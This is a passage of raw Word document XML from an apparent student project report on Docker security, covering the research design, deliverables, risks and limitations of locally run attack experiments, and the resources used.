      <w:bookmarkStart w:id="70" w:name="_Toc86859283"/>
      <w:r>
        <w:t>DATA COLLECTION AND ANALYSIS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="70"/>
    </w:p>
    <w:p w14:paraId="02350F84" w14:textId="2F314538" w:rsidR="0063410B" w:rsidRDefault="0063410B" w:rsidP="0063410B">
      <w:r>
        <w:t>Throughout the development of this project, data is collected</w:t>
      </w:r>
      <w:r w:rsidR="00134F32">
        <w:t xml:space="preserve"> through </w:t>
      </w:r>
      <w:r>
        <w:t>various methods and techniques</w:t>
      </w:r>
      <w:r w:rsidR="00134F32">
        <w:t>, including research, experimentation, and observation, to examine Docker security and provide future recommendations.</w:t>
      </w:r>
      <w:r w:rsidR="00C42343">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CF0535">
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00C42343">
        <w:t xml:space="preserve">he data is collected </w:t>
      </w:r>
      <w:r w:rsidR="00CF0535">
        <w:t>using</w:t>
      </w:r>
      <w:r w:rsidR="00C42343">
        <w:t xml:space="preserve"> secondary sources, such as</w:t>
      </w:r>
      <w:r w:rsidR="00CF0535">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C42343">
        <w:t>academia and journals relate</w:t>
      </w:r>
      <w:r w:rsidR="009E4E86">
        <w:t>d to the project topic. This data is then used to assist and develop the experiment</w:t>
      </w:r>
      <w:r w:rsidR="00163C8B">
        <w:t>. Then results obtained from the experiment are compared and analysed to literature review</w:t>
      </w:r>
      <w:r w:rsidR="00C052AA">
        <w:t xml:space="preserve"> findings to conclude the project</w:t>
      </w:r>
      <w:r w:rsidR="00163C8B">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00C052AA">
        <w:t xml:space="preserve"> In addition, this project involves </w:t>
      </w:r>
      <w:r w:rsidR="00333E13">
        <w:t>collecting data during the experiment through the observation method</w:t>
      </w:r>
      <w:r w:rsidR="007B4C71">
        <w:t xml:space="preserve">, which includes screenshots and </w:t>
      </w:r>
      <w:r w:rsidR="007B4C71">
        <w:lastRenderedPageBreak/>
        <w:t>videos to provide proof and illustrate reasons</w:t>
      </w:r>
      <w:r w:rsidR="00F63D94">
        <w:t xml:space="preserve">. Lastly, the results of the experiment are measured against </w:t>
      </w:r>
      <w:r w:rsidR="00CF0535">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00F63D94">
        <w:t>success or failure</w:t>
      </w:r>
      <w:r w:rsidR="00CF0535">
        <w:t xml:space="preserve"> of the attacks</w:t>
      </w:r>
      <w:r w:rsidR="00F63D94">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10393B7B" w14:textId="065BCAAE" w:rsidR="00CF0535" w:rsidRDefault="00CF0535" w:rsidP="00CF0535">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="71" w:name="_Toc86859284"/>
      <w:r>
        <w:t>RESEARCH DESIGN</w:t>
      </w:r>
      <w:bookmarkEnd w:id="71"/>
    </w:p>
    <w:p w14:paraId="0A7B332E" w14:textId="12475F24" w:rsidR="00CF0535" w:rsidRDefault="00EA35D0" w:rsidP="00CF0535">
      <w:r>
        <w:t>A research design is a blueprint or framework</w:t>
      </w:r>
      <w:r w:rsidR="000D42A3">
        <w:t xml:space="preserve"> containing all the methods and techniques of the research in a comprehensible and logical way</w:t>
      </w:r>
      <w:r w:rsidR="008C495D">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00AD61F9">
        <w:t xml:space="preserve"> As for the project, the research design supports </w:t>
      </w:r>
      <w:r w:rsidR="000D42A3">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="00AD61F9">
        <w:t>multi-method approach, containing six different components</w:t>
      </w:r>
      <w:r w:rsidR="00053846">
        <w:t>, as shown in figure 8.</w:t>
      </w:r>
      <w:r w:rsidR="00E22B03">
        <w:t xml:space="preserve"> The second phase contains the literature review, which is the core element of the research process for this project. This phase assists the author to study and gain u</w:t>
      </w:r>
      <w:r w:rsidR="0039772E">
        <w:t>seful</w:t>
      </w:r>
      <w:r w:rsidR="00E22B03">
        <w:t xml:space="preserve"> information from prior related works and </w:t>
      </w:r>
      <w:r w:rsidR="0039772E">
        <w:t xml:space="preserve">critically </w:t>
      </w:r>
      <w:r w:rsidR="00E22B03">
        <w:t>analyse</w:t>
      </w:r>
      <w:r w:rsidR="0039772E">
        <w:t xml:space="preserve"> the results</w:t>
      </w:r>
      <w:r w:rsidR="00E22B03">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0039772E">
        <w:t>obtained from the experiment process. Also, the information gained from this phase has significant importance to execute and establish the experiment process.</w:t>
      </w:r>
      <w:r w:rsidR="00B02F7C">
        <w:t xml:space="preserve"> T</w:t>
      </w:r>
      <w:r w:rsidR="0039772E">
        <w:t>he result obtained during the experiment is c</w:t>
      </w:r>
      <w:r w:rsidR="00B02F7C">
        <w:t xml:space="preserve">ompared and evaluated to this phase to validate and determine the </w:t>
      </w:r>
      <w:r w:rsidR="00CB545B">
        <w:t xml:space="preserve">project’s </w:t>
      </w:r>
      <w:r w:rsidR="00B02F7C">
        <w:t>outcome.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C24E86A" w14:textId="2FEDC989" w:rsidR="00053846" w:rsidRDefault="00053846" w:rsidP="00CF0535">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4789A974" wp14:editId="0736A747">
            <wp:extent cx="4867910" cy="38544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7910" cy="3854450"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5059639C" w14:textId="15F2C10D" w:rsidR="00053846" w:rsidRDefault="00053846" w:rsidP="00053846">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="72" w:name="_Toc86858599"/>
      <w:r w:rsidRPr="00053846">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00053846">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00053846">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00053846">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidRPr="00053846">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00053846">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: the research design process.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="72"/>
    </w:p>
    <w:p w14:paraId="34A09849" w14:textId="77777777" w:rsidR="002E3E98" w:rsidRDefault="002E3E98" w:rsidP="002E3E98">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="73" w:name="_Toc86859285"/>
      <w:r>
        <w:t>DELIVERABLES</w:t>
      </w:r>
      <w:bookmarkEnd w:id="73"/>
    </w:p>
    <w:p w14:paraId="4D0CB24E" w14:textId="409DF6E2" w:rsidR="00C21F2B" w:rsidRDefault="002E3E98" w:rsidP="002E3E98">
      <w:r>
        <w:t>The project includes research, experiment, and implementation processes to reach its goals. The research part assists the author to get a solid understanding</w:t>
      </w:r>
      <w:r w:rsidR="00240571">
        <w:t xml:space="preserve"> of the topic</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and construct the implementation</w:t>
      </w:r>
      <w:r w:rsidR="00240571">
        <w:t xml:space="preserve"> of the attacks. Also, the experiment is conducted based on the information and </w:t>
      </w:r>
      <w:r w:rsidR="00240571">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">knowledge gained from the literature review, and then the result is compared and analysed to the findings of the literature review to verify and conclude the outcome of the experiment. In general, the project provides the following </w:t>
      </w:r>
      <w:r w:rsidR="00C21F2B">
        <w:t>deliverables upon its completion</w:t>
      </w:r>
      <w:r w:rsidR="00C31417">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="623F6207" w14:textId="051843E2" w:rsidR="002E3E98" w:rsidRDefault="00C21F2B" w:rsidP="00C21F2B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>The various techniques and methods used to launch the attacks using videos and screenshots.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF0EDE7" w14:textId="2AA8D35A" w:rsidR="00C21F2B" w:rsidRDefault="00C21F2B" w:rsidP="00C21F2B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Vulnerable targets of the attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C0DBBE" w14:textId="5CE6B33E" w:rsidR="00C21F2B" w:rsidRDefault="00C21F2B" w:rsidP="00C21F2B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>The outcome of the experiment either as successful or failed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19773B1A" w14:textId="1F7C4A7D" w:rsidR="00C21F2B" w:rsidRDefault="00C31417" w:rsidP="00C21F2B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Provide mitigation techniques to the successful attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E426689" w14:textId="235F8850" w:rsidR="00C31417" w:rsidRDefault="00C31417" w:rsidP="00C21F2B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Analysis of the results.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22FD1E76" w14:textId="17CC78A2" w:rsidR="00C31417" w:rsidRPr="002E3E98" w:rsidRDefault="00C31417" w:rsidP="00C21F2B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Identify the vulnerabilities and provide remediation techniques based on the literature review.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041038EC" w14:textId="73124EC6" w:rsidR="00734A5B" w:rsidRDefault="00734A5B" w:rsidP="00734A5B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="74" w:name="_Toc86859286"/>
      <w:r>
        <w:t>RISKS &amp; LIMITATIONS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="74"/>
    </w:p>
    <w:p w14:paraId="528BF566" w14:textId="2042A21E" w:rsidR="00636563" w:rsidRDefault="006E0E77" w:rsidP="00734A5B">
      <w:r>
        <w:t xml:space="preserve">As part of a project, it is a good practice to identify and analyse the risks during a project development process </w:t>
      </w:r>
      <w:r w:rsidR="00DC01BE">
        <w:t xml:space="preserve">in order </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">to complete and achieve the project’s goals on time </w:t>
      </w:r>
      <w:r w:rsidR="00AB5D0B">
        <w:t>and to high-quality</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> standard</w:t>
      </w:r>
      <w:r w:rsidR="00AB5D0B">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00AB5D0B">
        <w:t xml:space="preserve"> The project uses </w:t>
      </w:r>
      <w:r w:rsidR="00DC01BE">
        <w:t xml:space="preserve">an </w:t>
      </w:r>
      <w:r w:rsidR="004E1FB6">
        <w:t>Ubuntu</w:t>
      </w:r>
      <w:r w:rsidR="00AB5D0B">
        <w:t xml:space="preserve"> laptop to conduct the attacks within the Docker environment.</w:t>
      </w:r>
      <w:r w:rsidR="00F12473">
        <w:t xml:space="preserve"> M</w:t>
      </w:r>
      <w:r w:rsidR="00DA07E6">
        <w:t xml:space="preserve">any potential risks </w:t>
      </w:r>
      <w:r w:rsidR="00F12473">
        <w:t xml:space="preserve">inside or outside </w:t>
      </w:r>
      <w:r w:rsidR="00DA07E6">
        <w:t xml:space="preserve">could affect or delay </w:t>
      </w:r>
      <w:r w:rsidR="00DC01BE">
        <w:t>the project</w:t>
      </w:r>
      <w:r w:rsidR="00F12473">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="007B1F15">
        <w:t xml:space="preserve">mainly associated with the </w:t>
      </w:r>
      <w:r w:rsidR="004E1FB6">
        <w:t>Ubuntu</w:t>
      </w:r>
      <w:r w:rsidR="007B1F15">
        <w:t xml:space="preserve"> laptop and Docker services</w:t>
      </w:r>
      <w:r w:rsidR="00DC01BE">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00F12473">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DC01BE">
        <w:t xml:space="preserve">One of the risks </w:t>
      </w:r>
      <w:r w:rsidR="00F12473">
        <w:t>is that the Docker software can cr</w:t>
      </w:r>
      <w:r w:rsidR="00071605">
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="00F12473">
        <w:t>sh or fail during the experiment</w:t>
      </w:r>
      <w:r w:rsidR="00071605">
        <w:t>, leading to potential data loss or damage.</w:t>
      </w:r>
      <w:r w:rsidR="00603410">
        <w:t xml:space="preserve"> To avoid such risks, a</w:t>
      </w:r>
      <w:r w:rsidR="00071605">
        <w:t xml:space="preserve">ll data </w:t>
      </w:r>
      <w:r w:rsidR="00636563">
        <w:t>is regularly backed up on the university</w:t>
      </w:r>
      <w:r w:rsidR="00603410">
        <w:t>’s</w:t>
      </w:r>
      <w:r w:rsidR="00636563">
        <w:t xml:space="preserve"> drive</w:t>
      </w:r>
      <w:r w:rsidR="00120A8C">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00636563">
        <w:t>ensur</w:t>
      </w:r>
      <w:r w:rsidR="00120A8C">
        <w:t xml:space="preserve">ing </w:t>
      </w:r>
      <w:r w:rsidR="00636563">
        <w:t>reliability and accuracy.</w:t>
      </w:r>
      <w:r w:rsidR="00603410">
        <w:t xml:space="preserve"> Also, the author installed </w:t>
      </w:r>
      <w:r w:rsidR="004E1FB6">
        <w:t>Ubuntu</w:t>
      </w:r>
      <w:r w:rsidR="00603410">
        <w:t xml:space="preserve"> on a virtual box on another laptop as a reserv</w:t>
      </w:r>
      <w:r w:rsidR="00E76EA8">
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="00883BCF">
        <w:t xml:space="preserve"> in case the first laptop failed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A24DB28" w14:textId="4CC8912D" w:rsidR="00045747" w:rsidRDefault="00B118CD" w:rsidP="00734A5B">
      <w:r>
        <w:t xml:space="preserve">Further, the project has a limited time to be completed, and thus external factors and poor time management can </w:t>
      </w:r>
      <w:r w:rsidR="006A770B">
        <w:t>adversely affect the project’s progress</w:t>
      </w:r>
      <w:r w:rsidR="009F550F">
        <w:t xml:space="preserve">. Therefore, a Gantt chart is used </w:t>
      </w:r>
      <w:r w:rsidR="00213435">
        <w:t>to monitor</w:t>
      </w:r>
      <w:r w:rsidR="009F550F">
        <w:t xml:space="preserve"> and manage each task</w:t>
      </w:r>
      <w:r w:rsidR="00213435">
        <w:t xml:space="preserve"> effectively,</w:t>
      </w:r>
      <w:r w:rsidR="00045747">
        <w:t xml:space="preserve"> and more time is given to th</w:t>
      </w:r>
      <w:r w:rsidR="00213435">
        <w:t xml:space="preserve">e critical tasks of the project. Besides, this project involves conducting security attacks on </w:t>
      </w:r>
      <w:r w:rsidR="009517B1">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00213435">
        <w:t>Docker environment</w:t>
      </w:r>
      <w:r w:rsidR="003033B4">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00732A5A">
        <w:t xml:space="preserve"> S</w:t>
      </w:r>
      <w:r w:rsidR="003033B4">
        <w:t xml:space="preserve">ecurity </w:t>
      </w:r>
      <w:r w:rsidR="00732A5A">
        <w:t>breaches</w:t>
      </w:r>
      <w:r w:rsidR="003033B4">
        <w:t xml:space="preserve"> can occur </w:t>
      </w:r>
      <w:r w:rsidR="009517B1">
        <w:t>due to many reasons, such as negligence, misuse</w:t>
      </w:r>
      <w:r w:rsidR="00732A5A">
        <w:t xml:space="preserve"> of</w:t>
      </w:r>
      <w:r w:rsidR="009517B1">
        <w:t xml:space="preserve"> tools, and accident. For such cases, an ethical form is signed, and the attack is carried out on a </w:t>
      </w:r>
      <w:r w:rsidR="00732A5A">
        <w:t xml:space="preserve">locally </w:t>
      </w:r>
      <w:r w:rsidR="00120A8C">
        <w:t xml:space="preserve">setup </w:t>
      </w:r>
      <w:r w:rsidR="00732A5A">
        <w:t>Docker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130E1B25" w14:textId="61E54E38" w:rsidR="00732A5A" w:rsidRDefault="00732A5A" w:rsidP="00734A5B">
      <w:r>
        <w:t xml:space="preserve">On the other side, this project has </w:t>
      </w:r>
      <w:r w:rsidR="00DC281B">
        <w:t>several</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> limitations. Firstly, the project’s main research body is limited</w:t>
      </w:r>
      <w:r w:rsidR="00DC281B">
        <w:t xml:space="preserve"> to examine Docker security with misconfigured or poisoned images. It is also limited to use Docker images of</w:t>
      </w:r>
      <w:r w:rsidR="00470F71">
        <w:t xml:space="preserve"> the</w:t>
      </w:r>
      <w:r w:rsidR="00DC281B">
        <w:t xml:space="preserve"> Debian family, such as </w:t>
      </w:r>
      <w:r w:rsidR="004E1FB6">
        <w:t>Ubuntu</w:t>
      </w:r>
      <w:r w:rsidR="00DC281B">
        <w:t xml:space="preserve"> and centos. Besides, the project </w:t>
      </w:r>
      <w:r w:rsidR="00DC281B">
        <w:lastRenderedPageBreak/>
        <w:t>scope is on Docker only, and therefore other containerisation technologies are not</w:t>
      </w:r>
      <w:r w:rsidR="0060612D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00842B57">
        <w:t>included and considered. In addition, the security attacks do not involve any production environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E8E9C90" w14:textId="1A3CAF7A" w:rsidR="00842B57" w:rsidRDefault="00842B57" w:rsidP="00734A5B">
      <w:r>
        <w:t xml:space="preserve">The project’s main cornerstone is the literature review part. However, as Docker is </w:t>
      </w:r>
      <w:r w:rsidR="00F46868">
        <w:t>a recent technology</w:t>
      </w:r>
      <w:r w:rsidR="00470F71">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00F46868">
        <w:t>there is not that much research about it.</w:t>
      </w:r>
      <w:r w:rsidR="00470F71">
        <w:t xml:space="preserve"> In addition, the author lacks deep knowledge and understanding of the research topic and may affect the project</w:t>
      </w:r>
      <w:r w:rsidR="00842742">
        <w:t>’s outcome</w:t>
      </w:r>
      <w:r w:rsidR="00470F71">
        <w:t xml:space="preserve">. Further, the time given for the project is </w:t>
      </w:r>
      <w:r w:rsidR="00842742">
        <w:t>minimal</w:t>
      </w:r>
      <w:r w:rsidR="00470F71">
        <w:t xml:space="preserve"> and tight</w:t>
      </w:r>
      <w:r w:rsidR="00842742">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00470F71">
        <w:t>and may impact the project’s quality and performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25249FE2" w14:textId="35003178" w:rsidR="00C31417" w:rsidRDefault="00C31417" w:rsidP="00C31417">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="75" w:name="_Toc86859287"/>
      <w:r>
        <w:t>RESOURCES AND PLANNING</w:t>
      </w:r>
      <w:bookmarkEnd w:id="75"/>
    </w:p>
    <w:p w14:paraId="637692C5" w14:textId="07150696" w:rsidR="00C31417" w:rsidRDefault="00C31417" w:rsidP="00C31417">
      <w:r>
        <w:t>The resources used in this project are the following:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CAA4ABC" w14:textId="627ADFE3" w:rsidR="00C31417" w:rsidRDefault="00C31417" w:rsidP="00C31417">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>A laptop with internet connection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EEC0306" w14:textId="72F01D1F" w:rsidR="00C31417" w:rsidRDefault="004E1FB6" w:rsidP="00C31417">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Ubuntu</w:t>
      </w:r>
      <w:r w:rsidR="00C31417">
        <w:t xml:space="preserve"> OS </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B187CEB" w14:textId="138BD3CB" w:rsidR="00C31417" w:rsidRDefault="00C31417" w:rsidP="00C31417">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Docker </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7648D20F" w14:textId="66E0CA2C" w:rsidR="00C31417" w:rsidRDefault="00895FE1" w:rsidP="00C31417">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Academic journals, such as google scholar, IEEE digital library etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B8DB64" w14:textId="49A4B874" w:rsidR="00895FE1" w:rsidRDefault="00895FE1" w:rsidP="00C31417">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Microsoft office packages and Gantt chart.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53CD8682" w14:textId="0BDF7D96" w:rsidR="009C00CC" w:rsidRDefault="00895FE1" w:rsidP="009C00CC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Text editor, </w:t>
      </w:r>
      <w:r w:rsidR="00F84BB9">
        <w:t>like vim for writing Docker images scripts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E199D1" w14:textId="77777777" w:rsidR="00F84BB9" w:rsidRDefault="00F84BB9" w:rsidP="00F84BB9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29B30874" w14:textId="3992D583" w:rsidR="002662EE" w:rsidRDefault="00F84BB9" w:rsidP="00F84BB9">
      <w:r>
        <w:t>The project’s plan is created based on the research design process (</w:t>
      </w:r>
      <w:r w:rsidR="00721CFC">
        <w:t xml:space="preserve">see </w:t>
      </w:r>
      <w:r>
        <w:t>figure 8</w:t>
      </w:r>
      <w:r w:rsidR="00721CFC">
        <w:t xml:space="preserve"> on the above</w:t>
      </w:r>
      <w:r>
        <w:t>), containing six main components. Figure 9 shows the project</w:t>
      </w:r>
      <w:r w:rsidR="002662EE">
        <w:t xml:space="preserve"> plan with the key</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> milestones</w:t>
      </w:r>
      <w:r w:rsidR="002662EE">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="327AAD33" w14:textId="08A15621" w:rsidR="00F84BB9" w:rsidRDefault="002662EE" w:rsidP="002662EE">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="483B2901" wp14:editId="55C1D624">
            <wp:extent cx="4425950" cy="1835150"/>
            <wp:effectExtent l="0" t="0" r="5080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071D2E8" w14:textId="6602AAEE" w:rsidR="002662EE" w:rsidRDefault="002662EE" w:rsidP="002662EE">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="76" w:name="_Toc86858600"/>
      <w:r w:rsidRPr="002662EE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="002662EE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="002662EE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="002662EE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidRPr="002662EE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
